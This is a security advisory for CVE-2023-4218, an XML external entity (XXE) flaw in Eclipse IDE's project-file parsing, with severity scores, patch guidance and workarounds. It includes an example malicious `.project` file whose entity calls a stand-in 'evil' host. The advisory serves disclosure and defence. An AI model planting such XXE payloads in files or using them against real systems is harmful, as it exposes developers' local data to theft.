CVE-2023-4218 – org.eclipse.platform:org.eclipse.ui.ide

Package

Manager: maven
Name: org.eclipse.platform:org.eclipse.ui.ide
Vulnerable Version: >=0 <3.21.100

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00026 pctl0.0576

Details

Eclipse IDE XXE in eclipse.platform ### Impact xml files like ".project" are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch). Vulnerablility was found by static code analysis (SonarLint). Example `.project` file: ``` <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE price [ <!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]> <projectDescription> <name>p</name> <comment>&xxe;</comment> </projectDescription> ``` ### Patches Similar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any `DOCTYPE`. ### Workarounds No known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb). ### References https://cwe.mitre.org/data/definitions/611.html https://rules.sonarsource.com/java/RSPEC-2755 https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)

Metadata

Created: 2023-11-30T19:52:54Z
Modified: 2024-03-05T21:36:55Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-j24h-xcpc-9jw8/GHSA-j24h-xcpc-9jw8.json
CWE IDs: []
Alternative ID: GHSA-j24h-xcpc-9jw8
Finding: F083
Auto approve: 1